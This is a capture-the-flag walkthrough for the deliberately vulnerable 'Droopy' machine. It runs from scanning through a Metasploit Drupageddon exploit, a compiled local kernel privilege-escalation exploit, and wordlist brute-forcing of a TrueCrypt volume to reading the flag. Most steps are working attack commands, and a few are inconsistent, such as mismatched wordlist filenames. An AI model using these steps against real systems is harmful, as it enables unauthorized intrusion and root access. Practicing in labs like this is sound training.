Introduction
In this post, You will learn how to CTF the Droopy this is a really very easy challenge stick till the end and I am sure you will be able to crack the box.
Have any doubt leave your question on the discord server.
To download droopy [Cllick here]
Video
Aim
There is 1 flag in Droopy and we have to find it.
Hacking Phases in Droopy CTF
- Finding target IP
- Network Scanning (Nmap)
- Identifies Drupal CMS
- Exploiting Drupal CMs (Metasploit)
- Privilege Escalation with Kernel Exploit
- Uploading and Downloading dave.tc from /www/html
- Generate a Dictionary with the help of rockyou.txt
- Brute Force attack on Truecrypt Volume (Truecrack)
- Decrypting File (Veracrypt)
- Capture the Flag
Finding target IP
To find the target IP just enter arp-scan -l or enter netdiscover command.
Nmap scan
Doing a full port scan and os and service scan.
nmap -p- -A 192.168.1.4
Found that port 80 is open and I just opened the web browser to view the target.
Identifies Drupal CMS
Head to the target website to have a look at it.
http://192.168.1.4
The website is powered by Drupal and there is an available exploit for drupal cms.
Exploiting Drupal CMs (Metasploit)
Open msfconsole
use exploit/multi/http/drupal_drupageddon
set rhost 192.168.1.4
exploit
Wait for the Meterpreter shell to open.
Privilege Escalation with Kernel Exploit
Open another terminal and type searchsploit 3.13.0
Copy this path to home directory /usr/share/exploitdb/exploits/Linux/local/37292.c
Once you saved it go back to Meterpreter shell and type.
cd /tmp
upload /home/osboxes/37292.c
Once the exploit is uploaded enter.
shell
python -c ‘import pty;pty.spawn(“/bin/bash”)’
gcc 37292.c -o shell
chmod 777 shell
./shell to execute the exploit
id
cd /root
ls
cp dave.tc /var/www/html
Uploading and Downloading dave.tc from /www/html
Now open a web browser and enter the target IP and this URL.
http://192.168.1.4/dave.tc
Now save the file dave.tc
cd /var
ls
cd mail
ls
cd www-data
l^?
cat www-data
Generate a Dictionary with the help of rockyou.txt
Generating dictionary list to crack the dave.tc file and the flag is hidden inside dave.tc
cat rockyou.txt | grep academy > /root/Desktop/dict.txt
Brute Force attack on Truecrypt Volume (Truecrack)
To crack the password
truecrack –truecrypt /home/osboxes/Downloads/dave.tc -k SHA512 -w paas.tx
The password is etonacademy for dave.tc file
Decrypting File (Veracrypt)
To decrypt the file we are using veracrypt.
Once the file is decrypted. Open the file in a terminal.
Capture the Flag
ls -la
cd .secret
ls -la
cd .top
ls -la
cat flag.txt